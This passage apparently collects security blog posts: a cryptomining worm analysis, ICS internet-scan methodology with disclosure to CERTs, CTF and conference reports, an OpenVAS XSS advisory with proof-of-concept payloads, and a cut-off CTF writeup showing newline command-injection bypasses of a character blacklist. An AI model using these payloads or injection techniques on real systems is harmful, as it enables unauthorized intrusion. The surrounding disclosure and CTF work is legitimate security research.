[...]string=/c for %%i in (A B C D E F G H J K L M N O P R S T Q U Y I X V X W Z) do xcopy /y "%s" %%i:\

Spreading methods and possible damage

The malware is using diffrent methods to infect other machines:

• Bruteforcing of FTP-servers (with wordlist)
• Copying itself to all attatched storage devices
• Using a 1x1 pixel sized Iframe within HTML-files to start an autodownload
• Setting up a wifi-hotspot (found in samples of GuardiCore)

In diffrence to ransomware, there is no visible damage, because the software only useses the CPU and only a tiny bit of storage - in general all services should work like before - only a bit slower. We also discovered the malware on Industrial Control Systemes - Viruses and trojans in such environments can become very dangerous if they try to spread aggressively.

It is not clear who the actual author is - but we think that the cybercriminals are really making a good profit off this mining botnet. It might be in a 6 or even 7-digits area.

We made a rough estimation and would like to share our calculation: We looked at the default mining configurations for monero and assumed that a great share of all infected systems might have a hashrate of 62 H/s (average dual core PC). (This hypothesis is very cautious, because gaming computers or server systems might have an even higher rate.) Furthermore we assumed a mining fee of 2%, which is also higher than normal, so a negativ aspect for the cybercriminals. If we use those preconditions and look at a mining calculator we get some interesting results:

1

50000 * 0,44 $ = 22000 $

Assuming 50000 infected machines, one would generate up to 22000 $ a week.

1

22000 $ * 36 = 792000 $

Because the threat actor has been active since last year or at least the beginning of 2016 (other reports of security experts point that out, for example GuardiCore), we can multiply it by the number of weeks passed in 2016 and we should have a quite good guess on how much the criminals may have earned. Of course one can also say that not all PCs are mining all the time and that AV engines might detect the virus - but the used assumption of 50000 infected machines could also vary and be much higher or lower in reality, partly because of the aggressive spreading techniques.

Some time ago Fireeye detected a malware sample from the same family - it used .top-domains for spreading. The command and control servers are the same as in our samples - so it is possible that it is the same threat actor or that it is kind of Malware as a Service Program (cybercriminal pay other cyberciminals for spreading their malware to victims)

Prevention and defense

The following list is a short overview of possible defense methods, in order to not get infected and to protect ourselfs from becoming part of an unwilling mining operation.

As a provider or administrator:

• Use strong passwords for FTP accounts
• Ban IPs which generate a lot of failed login attempts
• Blacklist the mentioned domains in your proxy service or firewall
• Keep the AV engine up to date

As an enduser:

• Be sceptical: Don’t open strange files with a double click
• Enable the option to show all file extentions in Windows
• Carefully use untrusted WiFis
• Don’t run autodownloaded scripts or applications
• Keep the AV engine up to date

The team of Internetwache.org

Everything started last year around october when Tim discovered a privacy issue at the swiss Prime Tower (article in german). Excited by this discovery he decided to look for further ICS and shortly discovered more. The first more interesting system was a waterwork, which after a report to the german CERT (BSI), was taken offline a couple of days later. At this point Tim and Sebastian decided to do a broader scan. You can find the results in the german article on Golem.de.

This blog post will try to describe the used methods, some numbers and background information.

All beginnings are difficult

At the beginning, Tim started out with a little python script and tried to scan the internet. He succeeded in finding some interesting things, however the process itself was slow. Nevertheless, Tim was able to pinpoint a specific value in a http header which most likely identified an ICS, which used a specific control panel. All that was missing was a more efficient process.

Sebastian had the idea of using Zmap, a tool developed by the university of Michigan, in combination with the tool Zgrab to scan the IPv4 space for the specific identifier. Regarding to the project’s website, one can scan the whole IPv4 space in just five minutes when an appropriate internet connection is used. This would allow us to scan a specific port and later apply different filter criterias on the dataset to discover different systems.

The command looked like this:

1

sudo zmap -B 10M -p 80 --output-fields='*' | ztee results.csv | zgrab --port 80 --http="/" | gzip >  banners.gz 

Admittedly, this approach was not the best one for us, because we couldn’t find an appropriate internet connection or hoster which would allow us to do such a scan without dealing with a lot of abuse mails and so on. Additionally, a slower connection (< 1 Gb/s) would have increased the scan duration to several hours or days.

That’s why we chose another option: Sebastian remembered that the project scans.io publishes exactly the same datasets that we wanted to create. Those datasets consist of different, internet-wide scans of different ports and protocols and are usually created every other week. In this category are weekly scans of HTTP requests and their responses to port 80. We used the lastest dataset, which was compressed around 80 gigabytes in size with exactly 62276536 entries. It contains all IPs out of the IPv4 space which successfully responded to a GET request.

Every entry contains the following information as JSON:

1
2
3
4
5
6
7

{
    "ip": "8.8.8.8"
    "host": "8.8.8.8",
    "vhost": "8.8.8.8", 
    "port": 80, 
    "data": base64(HTTP-answer), 
}

The ‘data’-field contains the full base64-encoded http response including all headers and the body.

Performing the scan

All human machine interfaces (HMIs) could be identified by a specific value in a HTTP header (2 diffrents varients/versions). Sebastian wrote a python script which decompressed the dataset, read it line-by-line and then looked for that specific value in the base64-decoded string. This reduced the dataset to 1796 entries.

1
2
3
4

$> python2 filter_scansio.py
$> wc -l output*.ips
     142 output-type1.ips
    1654 output-type2.ips

The script’s output probably contains some unnecessary empty or duplicate lines. Extracting all ip adresses gives a better number:

1
2

$> grep -oP "\d+\.\d+\.\d+\.\d+" /tmp/output-*.ips | sort | uniq | tac | wc -l 
838

In a first run we checked all ip addresses to see if they are still online and whether they are associated with a HMI or not. We noticed that most HMIs are http basic authentication protected - but we did not only find ICS, but also some porn websites which used the same pattern in the html code. We wanted to get rid of those “false positives”.

So we used another filter. In this case we used the name of a specific javascript file which was used by the software.

1

$> python2 js_filter.py | sort | uniq | tac | wc -l 

The dataset became smaller again - there were only a bit more than 60 systems left which did not make use of HTTP basic authentication.

After a few contacts with the affected operators we found out that our procedure to manually verify the status of an ICS was not very effective. This was the reason why Sebastian developed a plugin for the Nmap-Script-Engine (NSE), which was used to activate the filters and to look if the patterns apply. The final command looked like this:

1

$> nmap -n -PN -d --script nmap-find-hmis.nse -p 80 -iL all.ips  -oX nmap-all-ips-plugin-scan.xml -T paranoid

The output of the script was in nmap’s XML-format and only had to be filtered for diffrent categories:

• “Discovered, authenticated”
• “Discovered, unauthenticated”
• “Not Discovered”

To do so we coded another python-script:

1
2
3
4
5
6

$> python2 filter-nmap-plugin.py ./nmap-all-ips-plugin-scan.xml | sort -u | grep "Discovered, unauthenticated" | wc -l 
42
$> python2 filter-nmap-plugin.py ./nmap-all-ips-plugin-scan.xml | sort -u | grep "Discovered, authenticated" | wc -l 
40 
$> python2 filter-nmap-plugin.py ./nmap-all-ips-plugin-scan.xml | sort -u | grep "Not Discovered" | wc -l
673 

“unauthenticated” stands for ICS which did not make use of HTTP-basic-authentication and “authenticated” for basic auth-protected systems. Depending on the proxy and timeouts there were a few variations of the results - some systems had a very long response time, because they were in another part of the world or had a slow internet connection.

Results

At the end we had a list - we were able to use this list to find out a few interesting things about ICS. Out of all discovered ICS, only 50% were properly protected from unauthorized access by http basic authentication (however, still over an insecure HTTP connection). We didn’t want to use brute force or similar intrusive methods, so we focused on the accessible, unauthenticated systems. Simply typing the IP address into a browser’s address bar was enough. We identifed four major categories:

• Waterworks: 4
• Parking lots: ~10
• Smart homes or hotels: >5
• Biogas-/block or remote heating stations: 7

Geo-IP location helped us to estimate the affected countries, which are mostly from the DACH-area (Germany, Austria, Switzerland), but also USA, France, Italy, Isreal. This might be due to the fact that the vendor of the HMI sells it in the DACH area and lets reseller cover the other countries.

After analyzing our results we proceeded to contact more than ten different CERTs - most countries have one - informing them about the problem and systems which are at risk in their country. We politely asked to get in touch with the operators to secure the systems. A handful of CERTs thanked us for the information and assured us that they’ll try to contact the appropiate administrators. Sure enough more and more systems went offline or activated the password protection in the following weeks.

You can read more about this in the german article on Golem.de.

Vulnerabilities

During this project we also had a look at the webapplication’s security, after Tim had a first assumption at a specific point. Sure enough Sebastian was able to turn Tim’s assumption into a simple XSS. Furthermore he discovered a HTTP header injection. Both vulnerabilities are currently coordinated by the Cert-CC, but we’ll give more information as soon as the vendor releases a fix and CVE-IDs are assigned.

Timeline

To get an impression of how things went, we’ll share a rough timeline:

• October 2015

  • Looking into industrial routers / Discovery: Prime Tower web application

• October 2015 - January 2016

  • Multiple reports to the company => 3 months, end of responsible disclosure timeframe

• 22.01.2016

  • Article on golem.de

• 22.01.2016 (6 hours after publication)

  • Web application offline / Operator’s statement (see detailed description and analysis of the results)

• March / April 2016

  • Analysis of the saved data (HTTP-Requests, etc.), writing a scanner-script and using zmap

• Beginning of April 2016

  • First scan of public IP addresses (Discovered of some systems - more or less critical)

• 11.04.2016

  • Email: Asking the vendor if they’re aware of not properly configured systems

    • Requesting the security-manual
    • First request about specific parameters (which will later become security relevant)

• Mitte April 2016

  • Weekend: Furthers scans / Analysis: Discovery of a waterwork (!), Tim and Sebastian discover an XSS

• 17.04.2016

  • Email to Bund-CERT (BSI) - Informing them about the waterworks

• 18.04.2016

  • BSI acknowledgement: “We’ll contact the operators and try to help/fix it” (quote translated)

• 19.04.2016

  • Response from vendor - Mostly general information about products

• 19.04.2016

  • Response to vendor

    • Information about XSS
    • Mention: Discovery of waterwork
    • Request: Phone call

• End of April 2016

  • Sebastian discovers HTTP-Header-Injection (Proof of Concept send to the vendor)

• 20.05.2016 (1 month after our first answer)

  • Response from vendor - Phone call is possible

• 20.05.2016

  • Phone call with vendor via Skype

  • Content:

    • Vendor is not responsible for the client’s configuration
    • Vendor does not want to give general security information to clients, but can do so via its resellers.
    • Security-Manual: Work in progress, will be handed out in May
    • Request for a Demo system: Might be possible at the end of May

• End of May

  • Sebastian develops a new script => better and faster scanning possible

    • Usage of scans.io datasets
    • Development of a nmap plugin
    • Performing the broader scan (More than 120 hits, partly password protected)
    • First analysis of the results (further discoveries)

• 26.05.2016

  • Email to vendor

    • Mention of the main scan results
    • Appeal for quick fixes
    • Appeal for distribution of security information over resellers

• End of May 2016

  • Informing more than ten CERTs

• 06.06.2016

  • Response from Vendor (last received email): general information

• 09.06.2016

  • Response to vendor: Specific questions about vulnerabilities and disclosure process.

• 17.06.2016

  • Last request about more information
  • No reaction:
    • No information about the vulnerabilities
    • No security manual (manual for a secure operation of the software) => Should had been ready by May
    • No demo system

• End of June / Beginning of July 2016

  • Contacting multiple CERTs/operators again
  • Waiting for operators to secure their systems

• Beginning of July 2016

  • Reporting the vulnerabilities to CERT-CC asking for coordination/disclosure help

• 15.07.2016

  • Publication the article on golem.de
  • Publication of the tease-article at Spiegel.de
  • News spread across media

• 16.07.2016

  • Publication of the article in Print Spiegel

Sebastian had the chance to go to Heidelberg in March. He instantly booked the buses and enjoyed learning a lot as well as meeting awesome people.

The conference can be seperated into three parts:

• The trainings took place on the 14th and 15th of March and were one or two day long workshops about different topics. At the same time the IPv6-Security-Summit was held.
• The main conference took place on the 16th and 17th of March.
• The roundtables closed the conference on the 18th March and gave you the chance to discuss chosen topics.

Sebastian applied with a “Student Motivation Letter” for the main conference and was accepted as one of the “Next Generation Hackers”. After a 13 hour long busdrive (from Berlin) he arrived and instantly met two other student-“hackers” in the hostel. The main conference started with an awesome introduction and keynote on wednesday morning. There were around 300 visitors of whom 50 were speakers. The talks were categorized in three seperate tracks:

• Attack & Research
• Defemse & Management
• SAP Security

There were so many interesting talks, it is hard to figure out which to highlight here. Nevertheless, here’s a small list of quite informative talks:

• Casey Smith - Mind The Gap - Exploit Free Whitelisting Evasion Tactics
• Felix Wilhelm - Attacking Next-Generation Firewalls
• Oliver Matula - Imma Chargin Mah Lazer - How to protect against (D)DoS attacks
• Adrian Dabrowski - Hollywood Hacking
• Attila Marosi - How easy to grow robust botnet with low hanging fruits (IoT) - for free

But the talks were not the only attraction at Troopers. The organizers set up an event-only GSM-network and also a local CTF. You can find Sebastian’s writeup for the solutions to the local and PacketWars CTF at 0day.work. PacketWars started right after the shared dinner on wednesday evening. ‘Squareroots’ was the team Sebastian participated in and they won the first place.

Another highlight were the electronic badges which were distributed by the “Badge master” on the second day of the main conference.

Another nice hardware-gadget was a self-soldered USB-condom. The small USB-adapter cuts the data lines and thus allows you to charge your device on an untrusted charger by only powering the device.

All in all one can say, that the event was organized very well. It helped Sebastian’s personal progress and he met a lot of new nice people. He would be happy and is looking forward to participate as a student again next year.

The team of internetwache.org

In this blogpost, we will write about the CTF from the organizer’s perspective. What was the setup? What went wrong? What did we learn? What was good? What can we do better next year? We hope that this insight can help other CTF organizers in the future.

First of all, some words about us: Sebastian (aka gehaxelt ) participated as part of the ENOFLAG team in various CTFs (jeopardy / attack-defense) in the past. Tim (aka TPS) is not a regular CTF player - but was curious about helping Sebastian to host the first Internetwache CTF.

Somewhen during last november, Sebastian had the idea of hosting a jeopardy-style CTF. He was curious to see what it takes to host a CTF and to create challenges for other hackers. Fast forward to the beginning of february 2016 - We announced the CTF on ctftime.org and got an initial rating weight of 5.00. Afaik the rating is based on the ctftime-admin’s subjectivity. As we assumed a weight of 0.00 (like other CTFs), we were ok with that, but hope to get a better rating next year :)

The CTF should take place on the the 20th of february 2016, so there were around 3 weeks to setup and finalize everything. A ‘speciality’ was, if you want to call it that, that we did not sort the challenges by difficulty. There were two reasons for this: First is that it was a bit hard for us to estimate the difficulty of a challenge. Second is that you should be able to find the tasks you can solve in a short period of time - similarly to exams ;)

All in all we think that the CTF wasn’t bad - at least we had a lot of fun and positive feedback from the community. We’ll have a look at the feedback later on.

Some numbers:

Simply to give you an overview over the CTF in numbers:

• Scoreboard: https://ctf.internetwache.org/scoreboard
• Duration: 36 hours (20 Feb. 2016, 12:00 CET — 22 Feb. 2016, 00:00 CET)
• Registered teams: ~1500
• Active teams: ~650
• Teams that solved all challenges: 38
• Ctftime.org rating: 4.5
• Ctftime.org weight: 5.00
• Wall of Shame: 35 IP addresses
• HTTP requests: 2336957
• Traffic: ~20 GB
• Costs: 20$ (Hosting)
• Prizes: 0 (None) (If you want to be the sponsor for next year’s edition, feel free to send us an email :) )

We were excited to have as many as 650 active teams (solving at least one challenge). That’s a bit less than 50% of the total registration count. What disasspointed us were the 35 people who didn’t read the rules and used agressive automated tools and won a place in our iptables ruleset. However, some apologized and we were happy to unblock them again :) Another number that we over-estimated was the amount of traffic or resources in general.

Setup

For the hosting part we relied on Digitalocean.com, because we still had some bugbounty reward $$$ on our account and Sebastian is satisfied with them. Further reasons were that spinning up VMs takes less than a minute and that snapshots are free of charge what made testing different configurations a great experience.

We rent 4 VMs in total:

• 1x $5/mo as the monitoring VM, which collected and displayed the performance data of all other VMs with Collectd
• 3x $80/mo VM for the proxy, service and webserver VMs.

The ctf.internetwache.org domain pointed to a floating-ip which in turn pointed to the proxy-VM. All four VMs were interconnected using Digitalocean’s private network feature.

On the proxy-VM we configured NGINX to act as a load-balancer for the HTTP(s) and the TCP traffic. The web traffic was proxied to the webserver VM and the TCP traffic to the service VM. This central proxy allowed us to easily stop malicious attackers and scale to more VMs if needed. The webserver VM ran apache2, mysql and php5. We used the apache2-mpm-itk module to assign every vhost a different user. The service VM used tools like Daemontools and TCPServer to host the services. All VMs had Cgroups configured to limit resources of the CTF users in the ctf group.

This setup seems to be pretty solid, because we didn’t have any major load or stability issues during the CTF. In retrospect we could have used smaller VMs, but the cost difference was only ~$6.5 for the whole event and that was totally worth not having to worry about resources. During the CTF we only faced one minor incident.

We based our scoreboard on the tinyctf-platform. It’s written in python, easy to extend (we implemented CSRF protection and other features) and nice to look at. This scoreboard is Internetwache-approved and we may use it again next year.

Challenges

Let’s have a look at the challenges. There were six categories with five challenges each:

Misc

• Misc50: Octal and base64 encoding
• Misc60: Base64 and QR codes
• Misc70: Pcap dump with zip file
• Misc80: DNS requests and hex
• Misc90: Barcodes

Web

• Web50: PHP magic hashes
• Web60: PHP preg_replace with e modifier RCE
• Web70: MySQL truncation vulnerability
• Web80: Public git directory
• Web90: Latex RCE

Rev

• Rev50: MIPS assembly
• Rev60: File content checks
• Rev70: Switch case input checks
• Rev80: TapeBagel reversing
• Rev90: Rubiks Cube with flag

Crypto

• Crypto50: Multiple ciphers chained
• Crypto60: RSA key factoring
• Crypto70: Hash collisions
• Crypto80: Stegano / DTMF
• Crypto90: Modify ciphertext

Code

• Code50: Solve equations
• Code60: Find prime numbers
• Code70: Solve encoded equations
• Code80: Bruteforce a string
• Code90: BST tree operations

Exploit

• Exp50: Ruby Regex
• Exp60: Integer-Overflow
• Exp70: Variable-Overflow
• Exp80: Formatstring vulnerability
• Exp90: NodeJS ‘shell’

You can find all challenges and some configuration files on our GitHub repository.

Easter-Egg: All port numbers were primes ;)

Problems we faced

We are all humans and we also did some mistakes or faced some problems during the CTF. We think that it is important to talk about these issues:

Web70

The intended solution for this task was to use a mysql truncation vulnerability. This vulnerability worked way too good and once successfully exploited, allowed other teams to login with admin/admin or similar combinations. This obviously made the challenge way too trivial. We took down web70 for a while and implemented a quick ‘n’ dirty fix.

Web90

During the creation of the challenge, Sebastian thought of a specific way to solve it. Unfortunately, he forgot to disable/filter the straight forward \write18 command, what made this challenge trivial to solve with \immediate\write18{command}. However, we noticed this bug way too late to hot-patch it. We hope that you still learned something new :) Sebastian is going to write a blogpost on 0day.work about the intended solution eventually.

Rev90

This was the Rubik’s Cube challenge. Sebastian did a small mistake while manually scrambling the cube. A corrected version of the README was uploaded during the CTF. Sorry for that! (However, there was another way to solve the challenge without a cube)

Crypto50

This seemed to be an easy challenge from our point of view, but turned out to be way too difficulty (too much guessing?) for the participants. We should have made the description more clear.

Code70

The time format (TIME:CHAR) was a bit unclear.

Code90

The description was a bit unclear about the expected input/output format.

Duration

The duration was another thing that we should have chosen a lot shorter. We had the feeling that after around 24 hours there wasn’t much activity anymore. Only some teams who wanted to solve the remaining couple of challenges. There was, however, a peak during the last few hours again. People told us that longer CTFs are good for newcomer teams and timezone-daylight-differences, so in the end it wasn’t a problem at all. The next CTF will definitely be shorter (around 12 hours probably). Sebastian learned that in order to stay awake for 40 hours straight, two bottles of Club Mate are enough ;)

Difficulty

As this was the first time we hosted a CTF, it was hard for us to estimate the difficulty of the tasks. It turned out that the tasks were a bit too easy. However, as said above this helped newcomers to learn to ‘how to CTF’. We’ll try harder next time!

Less hints

We received the critique that we gave away too many hints via private chats. In retrospect that may be correct, but we tried to keep people motivated by asking them questions like ‘Where are you stuck? What did you try? What else do you know? What can you think of?’ and let them figure out the rest. In our opinion that reduces frustration and raises knowledge. But next time we’ll try to keep the hints more general and public (a separate ‘hints’ page is a good idea).

All in all, most of these problems could have been avoided with more thorough testing in the preparation phase.

Writeable directories

Some people told us that they solved a challenge by grepping for the flag format on the whole filesystem. That lead to some trivial flags because some files in directories like /tmp/ contained them. We fixed this issue during the CTF by using ACLs to remove write-permissions for users of the ctf group to directories like /tmp, /var/tmp and so on.

Load spikes

There was one interesting incident. We still don’t really now what happened, but the load spiked to 2600 and the RAM to 6gb at the same time. It looked like the Cgroups 6gb RAM limit was hit. Interestingly the VM was responsive and a restart of apache resolved the problem.

What we think we did well

Okay, let’s talk about some positive aspects of our CTF. In our humble opinion the uptime and overall stability of the services was good. Except the minor service downtimes due to bugfixes, all services were reachable during the CTF.

Another strong point was the communication. We were available on twitter and IRC throughout the whole CTF. We did not actively observe cheating, flag sharing or other bad behaviour on our IRC channel.

Giving some people an ‘ohh’-effect while solving the challenges. It seems like we allowed newcomers to enjoy and learn about CTFs and the good feeling when you finally solve a challenge.

Some refreshing and/or interesting challenges like exp80 / exp90 / web90 / rev90 / rev80 (Sebastian’s personal favorites).

What others think about the CTF

We used a Google Form to ask for feedback. 80 people were so kind to answer a handful of questions and we would like to share some answers with you.

Some charts:

General challenge feedback:

• Challenge and scoreboard availability was good, services seemed to be mostly up and responsive for me, even with so many participants, nice job on that! However, we had some beginners on the team and I think it’s great to have easy challenges as well so they don’t get frustrated. They should not constitute the heart of the contest though.
• Very good, especially for the 1st CTF you’ve run!
• A bit on the easy side - but that is also fine sometimes. Great quality in presentation, and descriptions.
• It seems little bit easy to solve the challenges, but even if that we’ve learned lots of new stuff from challenges in time.
• I liked that the difficulty was not immediately visible. Encouraged me to try all the challenges and not to start with the easy ones.

Final words:

• Extremly well done for the first time hosting a CTF, and one of the most enjoyable CTFs so far this year. Good challenge difficulty for beginning CTF teams. Time limit was okay, bit long maybe, but that leaves the less active teams time to enjoy the challenges
• Great IRC moderators! This CTF was well run which is very much appreciated after several badly run CTFs this year.
• Good job.Thanks :)
• Awesome job guys, looking forward to next year!
• I’d like to point out that your organizing work is clearly above average.
• Unlike some CTFs, this has potential to not suck. It’s a little rough right now, but I think everyone forgives you for minor mistakes in the beginnings of a major undertaking.

We are looking forward to hosting another CTF (presumably) next year!

The team of internetwache.org

TL;DR: #TheSAS2016 was a great experience and Tim learned a lot, because every day was filled with adventures or learning and seeing new things! The location was very nice, the atmosphere was amazing, the people were friendly - all in all everything was excellent!

First of all, for those who may not have seen #TheSAS2016 in their Twitter-Timeline, media or have no idea what SAS is about:

SAS stands for “Security Analyst Summit” and is an invite-only security event organized by Kaspersky. This year the SAS was on Tenerife (Canary Islands):

Ready for #TheSAS2016 pic.twitter.com/ClHu3yYzt0

— Tim Philipp Schäfers (@TimPhSchaefers) 6. Februar 2016

People from the security research community, law enforcement agencies and CERTs meet each other in order to debate and share their ideas how to secure the cyberworld and fight cyber-crime. This year there had been together more than 330 participants. The topics of talks are widely dispersed from cyber-espionage over webhacking, security/safety, malware analysis until ICS Hacking.

This year the keynode was held by John Lambert @JohnLaTwC. He is leading the Threat Intelligence Center of Microsoft and his talk was about “Changing the Physics of Defense”. Due to the fact that we at Internetwache.org are often in the position of an attacker and break applications of companies, this talk was really an eye-opener. On the one hand it showed how hard it is to secure systems or applications and on the other hand there were a lot of ideas how to achieve security through new approaches.

Modern defenders vs traditional: think about adversaries not incidents, by @johnlatwc #TheSAS2016 pic.twitter.com/gss5MITuO1

— Eugene Kaspersky (@e_kaspersky) 8. Februar 2016

John published his slides on Onedrive. We highly recommend you to take a look at it if you want to know how cutting-edge security concepts should look like and how Microsoft improves the security of their software and kills zerodays.

Besides some interesting talks about offensive and defensive security, there were a few revelations about interesting APTs (advanced persistent threats) and criminal tools like the “Poseidon APT” and “Adwind” and many others. We will summarize those two and link to interesting resources - for more information you should take a look at the SAS2016 articles on securelist.com.

Poseidon APT

Researchers of the Kaspersky GREAT Team detected the first Portuguese-speaking targeted attack group which presumably has been operating for a decade. The attackers are quite clever in concealing their traces. They use infrastructure of diffrent companies to attack other companies. The “Poseidon”-name comes from the compromise of the satellite communications infrastructure meant for ships on the sea. In some cases they made use of old wri-files (Windows Write Document) to bypass filter restrictions in combination with social engeneering. This group is probably still active. Tim wrote the first german blogpost about that APT on golem.de

Adwind

Malware-as-a-service seems to be a very successful business for cybercriminals. With “Adwind” Researchers of Kaspersky revealed a very popular cross-platform RAT (remote administration tool). It is completely developed in Java and thus runs on every platfrom (like Windows, Linux, Mac, etc.). The researchers found out that there is a kind of an online subscription model for the tool. This is the reason for the malware being used in diffrent APTs and spam campaigns.

There were a lot more good talks - for example about:

• hacking hospitals by @61ack1ynx
• Using visualisation for events in order to get more information about security incidents by @raffaelmarty from Pixlcloud
• Modern bank robberies

I'm not going to try to summarize this. Basically look for patterns. @raffaelmarty #TheSAS2016 pic.twitter.com/OFCKsqr6zA

— Chris Eng (@chriseng) 9. Februar 2016

The blogpost would not come to an end if Tim had to mention all the awesome talks and good work behind it - sorry about that :)

On the second day, Tim was very interested in the talk from Kymberlee Price @Kym_Possible from @bugcrowd and Katie Moussouris @k8em0 from HackerOne.

Background info, why Tim was so interested in the talks (for those who don’t know us for a long time): We (at Internetwache) have been doing bug bounty hunting and responsible disclousure since 2012 - Back then there were not many companies who had such programs (in europe it felt like there was not even one bug bounty program). So we appreciated the rise of companies like Bugcrowd or HackerOne who help with vulnerability disclosure and hope that the idea behind open security processes will expand. We have been quite active on both platforms from the beginning on: @Internetwache on Bugcrowd and @Internetwache on HackerOne . We’ve been bughunting as a team from the beginning, which isn’t seen often.

Back2Topic to the #TheSAS2016 talks:

In her talk Kymberlee pointed out that not the vulnerability disclosure policy itself is a problem (they are often designed well) but the missing trust between the researchers and companies. We agree on that and think that “trust” is essential for every bug bounty program. Researchers have to trust companies, but often companies don’t blindly trust researchers. We all have to work on that “trust” - perhaps there will be a blogpost in the future about that topic. She used a very fancy slide from David Lenoe to point out that researchers should be handled with care and that the security community should stick together:

"No one in the security community is evil … at least the ones who actually communicate with you." @Kym_Possible of @bugcrowd #TheSAS2016

— Internetwache (@internetwache) 9. Februar 2016

Katie @k8em0 also pointed out the importance of hackers in general with the statement “the world needs hackers”.

"The world needs Hackers" @k8em0 of @Hacker0x01 #TheSAS2016 pic.twitter.com/svkOkbQ0N7

— Tim Philipp Schäfers (@TimPhSchaefers) 9. Februar 2016

Her talk was about export controls and modern security. For researchers or security companies the problem of traveling with knowledge (like zero-days) often arises. The “Wassenaar Arrangement” makes it hard to travel with such information because “intrusion software technology” was set on the list of controlled goods - Katie wants that the “Wassenaar Arrangement” get changed because exemptions are not enough to ensure that infosec companies and researchers can work as they want to.

The last day of #TheSAS2016 was an entertainment day. We did a safari tour, visited the Teide National Park and the Observatorio del Teide :) and relaxed a bit … it was awesome to see the landscape and beeing on top of the Teide.

This blogpost does not cover a few other nice events at #TheSAS2016 like the gala dinner or some nice conversations Tim had on SAS2016 - but that’s all for today. If you want to know more about #TheSAS2016 you should take a look at Eugene Kaspersky’s Blog or his pictures on his Flickr

All in all: For Tim it was really impressive to meet some of the people you had only seen on Twitter or in the web and hear their ideas about security. There was only one sad thing: Some talks with month or year long research were presented in just 30 minutes - in some cases you really wanted to hear the full story. Nevertheless the event was great! It would be even nicer if more researchers were there - so if you ever get an invite to SAS it should be a no-brainer to make use of the great opportunity!

Hopefully we’ll meet at #TheSAS2017 :)

The team of internetwache.org

That was #TheSAS2016 - lets move on!
Thanks for the great time :) @kaspersky @e_kaspersky @ryanaraine @JacobyDavid pic.twitter.com/P4TvQ7oXUE

— Tim Philipp Schäfers (@TimPhSchaefers) 11. Februar 2016

PS: In Tim’s memories there will always be a “dick-pic guy” :) - But Tim will never reveal him. Remember, what happens at #TheSAS stays at #TheSAS!

For everybody who does not know what OpenVAS is: OpenVAS is a software for vulnerability management. You can run penetrationstests against diffrent it-systems with it and assess the results. It is also used in the Greenbone Security Manager and comes with Kali Linux.

CVE-2016-1926: XSS

If you take a look at the statistics page the following AJAX-Request is send to the backend:

1

https://[DOMAIN.tld]/omp?cmd=get_aggregate&xml=0&aggregate_type=nvt&group_column=severity&filt_id=1337&token=guest

The value aggregate_type was not escaped properly - so it was easy to trigger a XSS in the script context. You can simply set aggregate_type=nvt"-alert(document.domain)-" to get this reply:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

        DataSource ("get_aggregate",
                    {xml:1,
                     aggregate_type:"nvt"-alert(document.domain)-"",
                     group_column:"severity",
                     data_column:"",
                     filter:"",
                     filt_id:"1337"});

    title_total ("Nvts"-alert(document.domain)-" by severity",
                 "count")

Chart (gsa.data_sources ["aggregate-source"],
        gsa.generators ["aggregate-generator"],
        gsa.displays ["aggregate-display"],
        "aggregate-chart",
        "Nvt"-alert(document.domain)-" by severity",
        "/img/charts/severity-bar-chart.png",
        1,
        "",
        "");

Sadly you need to know the value of the token parameter. But if the guestmode is enabled like i.e. in the demo, it is possible to use: token=guest.

Another minor bug

The following bug was also fixed with this update. We observed the following strange behaviour:

1
2
3

GET //internetwache.org/? HTTP/1.1
Host: secinfo.greenbone.net
Connection: close

lead to

<a href="https://en.internetwache.org//internetwache.org/?r=1&amp;=&amp;token=guest">Login as a guest</a>

All characters of the path in the GET-request reflect to the href-attribute. Unfortunately a browser can not send a GET javascript:alert(1) request (a leading slash is required), so no way to create a XSS. However we can use the relative protocol to set an arbitrary url. Clicking the ‘Login as a guest’ link will redirect the victim to the other domain.

Details:

• Product: Greenbone Security Assistant ≥ 6.0.0 and < 6.0.8
• Vendor: OpenVAS
• Risk: Low, CVSS 1.9 (AV:A/AC:M/Au:M/C:P/I:N/A:N)

The communication with Greenbone GmbH was always pleasant, transparent and to the point.

• 07.01.2016: XSS discovered and reported to vendor.
• 08.01.2016, 08:00: Acknowledgement from vendor and info that fix is already in progress.
• 08.01.2016, 17:30: Fix ready, QA and testing needed
• 09.01.2016: Update released for Greenbone Security Manager: Advisory GBSA 2016-01
• 13.01.2016: Update released OpenVAS: Advisory OVSA 20160113
• 18.01.2016: CVE-2016-1926 assigned by MITRE

The team of internetwache.org

I didn’t solve smartcat1, because when I arrived at our team’s location, Denis @nobbd had already solved it and we continued with smartcat2. After solving the challenge, we were told that we didn’t use the intended solution of spawning a reverse shell, so we’ll share our solution with you as it was fun to work around the filter.

Note to myself: Save the burp instance more often and take notes for better writeups. (I’m writing this off my mind, so I probably forgot some (important) thoughts/steps)

Smartcat2

First of all, a few words about the challenge. It was a website which allowed to enter an IP address for the ‘ping’ command:

1
2
3
4
5
6
7

POST /cgi-bin/index.cgi?c= HTTP/1.1
Host: smartcat.insomnihack.ch
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

dest=127.0.0.1

As we learned in smartcat1, you could execute commands by using newlines (\n aka %0A) as the separator. E.g. dest=127.0.0.1%0Als would execute “ls”. However, there was a blacklist of not-allowed characters in place:

1
2
3
4
5

blacklist = " $;&|({`\t"
for badchar in blacklist:
        if badchar in dest:
                results = "Bad character %s in dest" % badchar
                break

So, we can’t really execute commands that require parameters, because spaces are covered by the blacklist. The standard bypass using “$IFS” doesn’t work, too, because “$” is on the blacklist. However, we can use < and > as a substitute for the pipe (|) for the majority of standard shell commands.

The first thing I wanted to know was which shell is used. Running “pstree” or “ps” or a similar command showed a bunch of sh processes. Okay, no bash magic useable :(

After playing around with “find” and “cat” we found the hint, that the flag is in the directory /home/smartcat. But find runs from the current working directory (/var/www/cgi-bin/) and we can’t change it, can we?

Using variables

We really wanted to do something like cd DIR, but spaces are still on the blacklist. By looking up the manpage of cd we learned the following: If DIRECTORY is supplied, it will become the new directory. If no parameter is given, the contents of the HOME environment variable will be used. Let’s see if we can change the value of $HOME to /home/smartcat. Setting environment variables in sh is as easy as running VARIABLE=VALUE. So to list the contents of the /home/smartcat directory, we used:

1

dest=127.0.0.1%0AHOME=/home/smartcat%0Acd%0Als

Okay, cool, we see the contents of /home/smartcat now. We can use this approach to jump into arbitrary directories. However, we can’t read flag2 as we lack read permissions, but we can execute readflag. Running strings on the binary file (%0Astrings<./readflag) revealed the next task:

1

